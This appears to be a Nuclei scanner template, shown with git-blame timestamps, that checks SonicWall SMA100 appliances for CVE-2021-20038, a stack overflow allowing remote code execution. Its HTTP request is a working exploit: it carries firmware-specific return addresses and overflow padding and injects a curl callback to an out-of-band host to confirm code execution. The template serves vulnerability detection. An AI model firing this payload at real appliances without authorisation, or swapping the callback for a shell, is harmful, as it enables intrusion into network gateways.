2022-01-18 05:20:14 +00:00
id : CVE-2021-20038
info :
2022-04-29 19:58:07 +00:00
name : SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
2022-01-18 05:20:14 +00:00
author : dwisiswant0, jbaines-r7
severity : critical
2022-05-17 09:18:12 +00:00
description : A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability.
2022-01-18 05:20:14 +00:00
reference :
- https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
2022-04-29 19:58:07 +00:00
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026
- https://nvd.nist.gov/vuln/detail/CVE-2021-20038
2023-04-12 10:55:48 +00:00
- https://github.com/jbaines-r7/badblood
2022-01-18 05:22:01 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-18 05:22:01 +00:00
cve-id : CVE-2021-20038
2023-07-11 19:49:27 +00:00
cwe-id : CWE-787,CWE-121
2023-10-14 11:27:55 +00:00
epss-score : 0.95763
2023-10-22 12:16:24 +00:00
epss-percentile : 0.99228
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : sonicwall
product : sma_200_firmware
tags : cve,cve2021,overflow,rce,sonicwall,kev
2023-03-29 11:07:38 +00:00
variables :
2023-03-29 14:11:27 +00:00
useragent : '{{rand_base(6)}}'
2023-03-29 11:07:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-18 05:20:14 +00:00
- raw :
- |
2023-03-29 13:54:19 +00:00
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
2022-01-18 05:20:14 +00:00
Host : {{Hostname}}
payloads :
prefix_addr :
2023-07-11 19:49:27 +00:00
- "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address
2022-01-18 05:20:14 +00:00
system_addr :
2023-07-11 19:49:27 +00:00
- "%08%b7%06%08" # for 10.2.1.2-24sv
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
attack : clusterbomb
2022-01-18 05:20:14 +00:00
2023-03-29 06:39:20 +00:00
matchers-condition : and
2022-01-18 05:20:14 +00:00
matchers :
- type : word
2023-03-29 06:39:20 +00:00
part : interactsh_protocol
2022-01-18 05:20:14 +00:00
words :
2022-02-21 18:33:16 +00:00
- "http"
2022-04-29 19:58:07 +00:00
2023-03-29 06:39:20 +00:00
- type : word
part : interactsh_request
words :
2023-03-29 13:54:19 +00:00
- "User-Agent: {{useragent}}"
2023-10-23 07:14:07 +00:00
# digest: 4a0a00473045022100c2c083cf5cd5c8cd4bcdabd41742394a7f1b7fc67bb3ab4d6a135714e6a3ab5b02202034d44dd1c1f2e2a1943ec3091dd041e06fb2b5c35b270fc772ebe33fba0d61:922c64590222798bb761d5b6d8e72950